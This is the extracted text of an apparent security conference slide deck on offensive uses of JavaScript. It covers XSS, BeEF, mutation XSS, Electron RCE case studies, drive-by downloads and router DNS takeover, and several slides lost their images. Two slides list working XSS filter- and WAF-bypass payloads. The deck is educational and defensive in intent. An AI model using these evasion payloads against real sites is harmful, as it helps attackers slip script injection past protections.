CAPTAIN MARVELLOUS JAVASCRIPT A L O O K AT T H E V E R S AT I L I T Y O F J S A N D H OW H A C K E R S U S E I T 

ABOUT ME? • Riyaz Walikar, Chief Hacker @Appsecco • Several years of security experience in breaking things (Offensive Security) • All kinds of things (applications/mobile/systems/networks/wireless/cloud) • Love to travel, do photography and stargaze • Comic nerd Appsecco – https://appsecco.com @appseccouk 

WHAT IS THIS TALK ABOUT? • The versatility of JS and its application in unorthodox circumstances and in offensive use cases. • JavaScript is everywhere. As much as it is used to build stuff, several use cases exist where hackers use JS to break stuff as well. • We will look at examples from Computer Security where JS is used to detect vulnerabilities, build payloads, reliably exploit software, infra and humans alike. • This talk is meant to introduce the audience to the various applications of JS (or its variations) from an attacker point of view and provide real world examples while doing so Appsecco – https://appsecco.com @appseccouk 

JAVASCRIPT AND XSS: IS THAT IT? I C O N F I R M E D W H E N YO U P R O M P T E D F O R A N A L E RT 

IS THIS ALL THERE IS TO XSS? Appsecco – https://appsecco.com @appseccouk 

WE ALL KNOW • XSS occurs when user controlled data is reflected back in the browser as-is and is then processed by the browser’s JS engine • This user controlled data when run in the browser’s JS engine will have the same capabilities as developer written JS Appsecco – https://appsecco.com @appseccouk 

WHAT XSS IS CAPABLE OF @appseccouk How most developers see XSS How most attackers see XSS https://www.polygon.com/2017/5/17/15624888/guardians-of-the-galaxy-vol-2-mantis-wrong https://www.looper.com/63592/untold-truth-baby-groot/ 

WHAT CAN YOU DO WITH XSS? • XSS can be used to (not an exhaustive list) – Read and send session data elsewhere – Read secrets in the DOM – Redirect users to malware infested sites / pornographic content – Steal the system CPU time to mine bitcoins – Steal keyboard keys (credentials) – Browser exploitation and Remote Code Execution – Phishing attacks / Framing content – Hack into internal routers and update the DNS or gateway IP to steal all network traffic Appsecco – https://appsecco.com @appseccouk 

I'VE GOT NO BEEF WITH YOU! • Automated Tool to work with XSS infected zombies (browsers) • Features of BeEF (Browser Exploitation Framework) – Browser and OS fingerprinting – User behavior fingerprinting and Social Engineering – Fake Flash Update to install rogue extension – Identify internal IP address – Port scanner, network map creation – Run Metasploit modules to perform exploitation – Tunnel traffic through the browser – Geolocation of the browser Appsecco – https://appsecco.com @appseccouk 

No content

No content

DEMO: BEEF IN ACTION Appsecco – https://appsecco.com @appseccouk 

MUTATION XSS N OT C A N C E R O U S B U T M O R E L I K E J E A N G R E Y 

MUTATION WHAT? • First described by Mario Heiderich in 2013, is a technique that relies on Browser engines to mutate strings when placed inside an innerHTML context. • The earliest known example was by a researcher called Yosuke Hasegawa in IE’s innerHTML in 2007 • He noticed that in IE, an element’s attribute bled into the document when using Print Preview when the attribute contained backticks Appsecco – https://appsecco.com @appseccouk 

• IN • OUT Appsecco – https://appsecco.com @appseccouk https://tenor.com/view/what-thor-confused-chris-hemsworth-gif-13355644 

MUTATION WHAT? • Basically, user controlled input is innocuous as it passes through server filters, client filters, WAF, browser protections etc. but is made malicious by the browser when injected into innerHTML • Over the years, multiple vectors have been discovered that can be used to trick browsers into rendering malicious content while passing through filters and protections as harmless strings Appsecco – https://appsecco.com @appseccouk 

CS: THE GOOGLE XSS • Most attackers dream of getting an XSS on the Google home page via the search bar Appsecco – https://appsecco.com @appseccouk 

CS: THE GOOGLE XSS BACKGROUND • On Sept 26 2018, a developer working on the Closure library created a commit that removed part of input sanitisation. The Google Search bar uses the Closure library • In Feb 2019, Masato Kinugawa discovered that this allowed a mutation to occur when a noscript tag was used with malformed HTML. The closure library would parse the input via template element and render it via div innerHTML • To understand this better, let’s take a look at how browsers mutate broken HTML Appsecco – https://appsecco.com @appseccouk 

CS: THE GOOGLE XSS BROWSER MUTATIONS • Save this as a.html

CS: THE GOOGLE XSS BROWSER MUTATIONS

CS: THE GOOGLE XSS THE NOSCRIPT TAG MUTATION • Closure library utilised the template tag to obtain safe HTML to be then passed to a div • The `template` element does not parse JS but a `div` does • If we pass a `` tag containing a broken noscript tag and an xss vector, the noscript tag would be parsed by `template` and then `div` causing the xss to trigger Appsecco – https://appsecco.com @appseccouk 

Appsecco – https://appsecco.com @appseccouk 

SERVER SIDE JS ATTACKS L E T ’ S G I V E J S F U L L A C C E S S TO S E RV E R R E S O U R C E S , S A I D N O O N E E V E R 

“User supplied data should never be used inside an execution context without first checking if the data has any special meaning within that context” Appsecco – https://appsecco.com @appseccouk - Every programming language ever https://www.businessinsider.in/The-best-part-of-the-Captain-Marvel-trailer-has-now-become-a-hilarious-meme/articleshow/65875962.cms 

THE PERILS OF SERVER SIDE USER CODE • Where is the data coming from? • Where will the data be processed? • Will the function processing the data validate if the data is benign within it’s context? • Server side processing has access to the OS and its resources • User supplied data may be able to traverse server side objects and reach functions that would otherwise remain hidden/protected Appsecco – https://appsecco.com @appseccouk 

SERVER SIDE JS INJECTION SPOT THE BUG Appsecco – https://appsecco.com @appseccouk A Server Side JavaScript Injection occurs when user input is passed to a server function that performs a JS eval. This could be done through multiple JS functions like eval(), setTimeout(), setInterval() and Function() 

DEMO: REMOTE CODE EXECUTION • Crudely written webservice (remember I’m not a dev ☺) • Try it out from here - https://github.com/appsecco/vulnerable- apps/tree/master/node-simple-rce • Has multiple routes that perform multiple functions • Written in nodejs (express) with MongoDB backend • Quick test cases to check if user input ends up in eval context – Math: 5-4 – JS objects: undefined, String – Response objects: res, resp, response, rs • Then load other modules using require and use res.send to receive Appsecco – https://appsecco.com @appseccouk 

JS AND DESKTOP APPLICATIONS 

MIXING DESKTOP CLIENTS AND JAVASCRIPT (WCGW) • JavaScript is now on the Desktop via Electron • Electron = Chromium front-end + NodeJS backend = Pseudo Native Platform Agnostic App • A lot of commonly used applications have now been ported to Electron • So from an attacker point of view – You have an app running on your desktop – To which I can send input (via a message, network traffic, hosted content, shared file or any feature) – The app uses JS to parse user provided input – WCGW Appsecco – https://appsecco.com @appseccouk 

SOME ELECTRON APPS • Visual Studio Code (FTW) • Slack • Skype • LosslessCut • Waiterio Restaurant POS • Microsoft Teams • Snipline • Windows 95 Appsecco – https://appsecco.com @appseccouk 

Appsecco – https://appsecco.com @appseccouk https://github.com/felixrieseberg/windows95 

CS: CODE EXECUTION USING JAVASCRIPT IN A DESKTOP APP • AttackSurfaceAnalyzer (ASA) is a tool that takes a snapshot of your system state before and after the installation of other software product(s) and displays changes to a number of key elements of the system attack surface • ASA uses Electron.NET which is a wrapper around a "normal" Electron application with an embedded ASP.NET Core application. Electron APIs are invoked using a Electron.NET IPC bridge from .NET • An RCE was discovered in ASA due to the infamous NodeIntegration flag being set to true • This allows a JavaScript payload to spawn up processes on the target Appsecco – https://appsecco.com @appseccouk 

CS: CODE EXECUTION USING JAVASCRIPT IN A DESKTOP APP WHAT WAS THE ISSUE AND THE EXPLOIT? • NodeIntegration flag was set to true in WebPreferences.cs • Allows calling of other modules like process_wrap or child_process • An XSS can result in server side code execution Appsecco – https://appsecco.com @appseccouk 

CS: CODE EXECUTION USING JAVASCRIPT IN A DESKTOP APP TRIGGERING THE PAYLOAD AND CODE EXEC • Using an encoder to convert to either base64 or charCode, the entire payload can be passed via an onerror trigger • Appsecco – https://appsecco.com @appseccouk 

No content

CS: RCE VIA COMMAND LINE ARGS IN EXODUS WALLET • Electron was vulnerable to a Protocol Handler Vulnerability, affecting apps that use custom protocol handlers. • Assigned CVE-2018-1000006 • Basically, Electron apps designed to run on Windows that register themselves as the default handler for a protocol, like myapp://, are vulnerable • A ton of apps became vulnerable due to the way the protocol handler could be used to pass additional parameters to the chromium window running the app • Example of this bug in Exodus, a cryptocurrency wallet handler. Appsecco – https://appsecco.com @appseccouk 

CS: RCE VIA COMMAND LINE ARGS IN EXODUS WALLET THE BUG • Exodus registers a protocol handler, exodus://, which when invoked would launch the app • Browsing to a page containing the following code would result in Exodus launching with the command line args provided @appseccouk Appsecco – https://appsecco.com 

CS: RCE VIA COMMAND LINE ARGS IN EXODUS WALLET THE EXPLOIT • Using the list at https://peter.sh/experiments/chromium-command-line- switches/, a command line switch was identified that would allow custom program to be launched @appseccouk Appsecco – https://appsecco.com 

CS: HTML INJECTION IN SIGNAL VIA REACT HANDLER • A Quoted reply on Signal led to evaluation of HTML content • Signal internally uses React to render UI elements in the Chromium window • Issue in how the renderText() function in Quote.tsx set the HTML in the window Appsecco – https://appsecco.com @appseccouk 

CS: HTML INJECTION IN SIGNAL VIA REACT HANDLER THE EXPLOIT • As the exploit relies on the user quoting a message containing valid HTML, an attacker could send messages containing HTML elements rendered as literals • When this is quoted in a reply, the HTML could be made to become part of the window and an innerHTML could cause execution • No public PoC released, however a message such as follows would work in this context Appsecco – https://appsecco.com @appseccouk 

BREAKING FILTERS AND WAFS? W H Y B L A C K L I S T S D O N ’ T M AT T E R 

COMMON BYPASSES • JS objects, variables and functions can be represented in many forms • If the PoC is to generate an alert box, several different forms of calling the alert work • Depending on the filter being targeted, you need to analyse the output that is received for various mutations of the input • Primarily, the following forms of manipulations can be tried – Representing an object differently – Using encoding techniques – String and object manipulation to access functions and attributes – Relying on browser and JS engine implementations to transform innocuous objects Appsecco – https://appsecco.com @appseccouk 

COMMON BYPASSES • Some of the more common representations and usage include the following cases – alert(/xss/) – eval("ale"+"rt(0)") – Function("aler"+"t(0)")() – onerror="alert;throw 1" – onerror=eval;throw'=confirm\x281\x29'; – javascript:\u0061lert(1) – – eval(17795081..toString(36)+"(0)") – " onmouonmouseoverseover=alalertert(0) – self['\x61\x6c\x65\x72\x74']('\x58\x53\x53') Appsecco – https://appsecco.com @appseccouk 

JS WEIRDNESS (FOR ATTACKERS) • JS can get real weird real quick for attackers and different representations can be used as attack payloads • It’s perfectly legal JS, but due to the representation itself it appears weird™ • Using an obscure form of JS representation called JsFuck, you can create objects, strings and other entities ready for execution without using strings or numbers • It uses only six different characters to write and execute code - ()+[]! Appsecco – https://appsecco.com @appseccouk 

JS WEIRDNESS Appsecco – https://appsecco.com @appseccouk 

JS WEIRDNESS Appsecco – https://appsecco.com @appseccouk 

Appsecco – https://appsecco.com @appseccouk 

BREAKING FILTERS/WAFS • Depending on the context where reflection is occurring, different forms of input can be tried • For dynamic filters that strip away blacklisted words like onmouseover, onload etc. the following test cases can be applied – " onmouonmouseoverseover=alalertert(0 – – " ontouch=alert(0) • Some filters may not detect payloads sent using newline or whitespace characters – " name=test%0d%0aalert(0) • If the WAF/filter allows Unicode representation to pass through, you could use something like – xss\"\u003E\u003Ch1 onmous\u0045over=al\u0065r\u0074(domain)\u003EPayload\u003C/h1\u003E Appsecco – https://appsecco.com @appseccouk 

MALWARE, JAVASCRIPT AND OBFUSCATION YO U W I L L N OT B E L I E V E W H AT H A P P E N E D N E X T 

MALWARE AND THE INTERNET • Almost all modern malware infections, social engineering attempts, phishing and targeted ad campaigns are now delivered through the Internet • Attackers compromise high traffic website, inject malicious JavaScript as part of the page or add an iframe that redirects the user to a phishing site or simply prompts to download and run “antivirus software” • The compromise may have been done using a Stored XSS, a weak admin password, server side code execution vulnerability or due to the usage of a vulnerable library hosted on a CDN • Attackers also heavily rely on user’s browsing habits, clickbaity articles and user belief in phishing emails to achieve what is known as a “drive by download” attack Appsecco – https://appsecco.com @appseccouk 

GETTING A USER TO NAVIGATE Appsecco – https://appsecco.com @appseccouk https://www.thedailystar.net/shout/the-internet/news/five-stages-dealing-clickbait-1734130 

CS: DRIVE BY DOWNLOADS https://www.reddit.com/r/MovieDetails/comments/87xkts/at_the_end_of_avengers_age_of_ultron_tony_stark/ 

No content

No content

CS: DRIVE BY DOWNLOADS THE ATTACK CHAIN • User’s are tricked into navigating to a site laden with JS that profiles the browser, addons, the OS and other plugins that may be active (think Flash, Java, Silverlight (?)) • A legitimate site may also be affected with malicious JavaScript via a server side vulnerability or a compromised CDN • A weakness in the browser or third party components is exploited to download/run additional code without user interaction • The user may additionally/alternatively be phished to download and run a binary irrespective of a browser weakness • The binary when run natively on the machine, gives complete access to the attacker, allowing them to manage the machine remotely or add them to a larger bot network Appsecco – https://appsecco.com @appseccouk 

CS: DRIVE BY DOWNLOADS AN EXAMPLE EXPLOIT – AOL SUPERBUDDY EXPLOIT • A legit site was infected with malicious JS via SQL Injection. The HTML code was injected in all pages on the site • The script checks for a cookie to verify if the browser has been attacked before. If no cookie is found, a new cookie is set to mark the beginning of an exploit attempt • A new iframe is created using JS with 0 dimensions. This iframe loads another script from iroe.ru by using the User-Agent request-header field to detect the user’s browser and Operating System • Returned script uses obfuscation techniques and polymorphism to make analysis difficult • Uses location.href as a key to decode encoded strings which makes static analysis difficult Appsecco – https://appsecco.com @appseccouk 

CS: DRIVE BY DOWNLOADS AN EXAMPLE EXPLOIT CONTD. • A sample of the partially deobfuscated code is shown below Appsecco – https://appsecco.com @appseccouk • The script attempts to execute 3 exploits in the if loop, targeting different vulnerabilities • Code creates an ActiveXObject from the AOL SuperBuddy plugin, if successful it executes Exhne69P • The function loads shellcode onto the browser’s heap through various string manipulations so that if the exploit is triggered, the execution will land in the loaded shellcode (heap-spray method) • Actual exploit is triggered by invoking the LinkSBIcons method with a large integer causing an overflow 

USING JAVASCRIPT TO FUZZ BROWSERS N OW YO U S E E M E , N OW YO U D O N ’ T 

BROWSER FUZZING? Appsecco – https://appsecco.com @appseccouk Create HTML pages containing JavaScript that creates and destroys and attempts to re- use destroyed elements from the DOM (example). Create several hundred/thousand mutations of these files as input to different browsers Attempt to load them in a browser attached to a debugger to monitor memory access and system usage Browser crash could mean access to a memory location or control of code flow due to the input HTML+JS page May potentially lead to an info leak or remote code execution or a vulnerability that could be further exploited Many different automated engines/tools available to fuzz browsers. Most of them being open source. 

TOOLS, BROWSER CRASHES AND THE $$$ • Several popular tools like Domato, Grinder attempt to make Browser Fuzzing easier for even novices • Many researchers have written their own tools, scripts, debuggers and other automation around fuzzing browsers • Browser fuzzing and exploitation is a lucrative industry • Several companies buy exploits from researchers including browser vendors themselves • Events like Pwn2Own and other conferences provide cash prizes upwards of 40,000 USD to hackers who successfully hack major browsers • Browser vendors run Bug Bounty programs to safely patch vulnerabilities while paying researchers for their work and working exploits Appsecco – https://appsecco.com @appseccouk 

No content

No content

ATTACKING NET WORK DEVICES USING JAVASCRIPT A D M I N A D M I N A N D F U N T H I N G S 

TAKING OVER THE DNS OF A NETWORK – ATTACK SCENARIO • A user browses to a website using a browser like Chrome or Firefox • The browser loads a piece of JavaScript that uses WebRTC to compute the internal IP address of the machine • This IP is passed to another function that uses it to create the presumed Gateway address and load an image • The image load URL has the default credentials passed via the URL resulting Basic Auth to go through • On successful load of the image, additional functions are called to set the internal DNS of the router and to make the admin console public Appsecco – https://appsecco.com @appseccouk 

TAKING OVER THE DNS OF A NETWORK – CODE SNIPPET • A simple HTML Page example Appsecco – https://appsecco.com @appseccouk 

TAKING OVER THE DNS OF A NETWORK – CODE SNIPPET • The bodyOnLoad function to retrieve the internal IP using WebRTC Appsecco – https://appsecco.com @appseccouk 

TAKING OVER THE DNS OF A NETWORK – ATTACK SCENARIO • The bodyOnLoad function to retrieve the internal IP using WebRTC Appsecco – https://appsecco.com @appseccouk 

WHAT COULD GO WRONG FROM HERE • Active and Passive Man-in-the-Middle attacks • Phishing attacks to steal credentials by loading attacker controlled domains • Botched program updates received from malicious domains allow direct compromise of the victim system(s) • Attacker has essentially full visibility and control of the target network Appsecco – https://appsecco.com @appseccouk 

CLOSING NOTES 

TO CLOSE • JS is not only used to build stuff but actively used by attackers to do all sorts of cool things • Do not trust user input, anytime, anywhere • Patch your browsers, update your apps • Change default credentials, everywhere • Be wary of the sites you visit, the links you click and the attachments you open • There is no Nigerian prince who wants to give you money 

Q & A 

REFERENCES • https://github.com/beefproject/beef/wiki • https://cure53.de/fp170.pdf • https://www.youtube.com/watch?v=lG7U3fuNw3A • https://github.com/appsecco/dvna • https://parsiya.net/blog/2019-06-18-chaining-three-bugs-to-get-rce-in-microsoft-attacksurfaceanalyzer/#vuln-3-xss-to-rce-via- nodeintegration • https://hackernoon.com/exploiting-electron-rce-in-exodus-wallet-d9e6db13c374 • https://thehackerblog.com/i-too-like-to-live-dangerously-accidentally-finding-rce-in-signal-desktop-via-html-injection-in-quoted- replies/ • https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xss.md • https://gist.github.com/xsscx/0e55b25f6b959bf572a9 • https://support.google.com/webmasters/answer/3024344?hl=en • https://sites.cs.ucsb.edu/~vigna/publications/2010_cova_kruegel_vigna_Wepawet.pdf • https://blog.sucuri.net/2017/12/javascript-injection-creates-rogue-wordpress-admin-user.html • https://github.com/Escapingbug/awesome-browser-exploit • https://www.pentestpartners.com/security-blog/lan-surfing-how-to-use-javascript-to-execute-arbitrary-code-on-routers/ • https://www.spamfighter.com/News-20220-Malware-Based-on-JavaScript-Attacks-DNS-Settings-of-Your-Router.htm • https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-devices-used-to-execute-dns-malware-against-home- routers/ 

THANK YOU! • Riyaz AhemedWalikar • @riyazwalikar • @appseccouk • https://blog.appsecco.com • https://appsecco.com • https://ibreak.software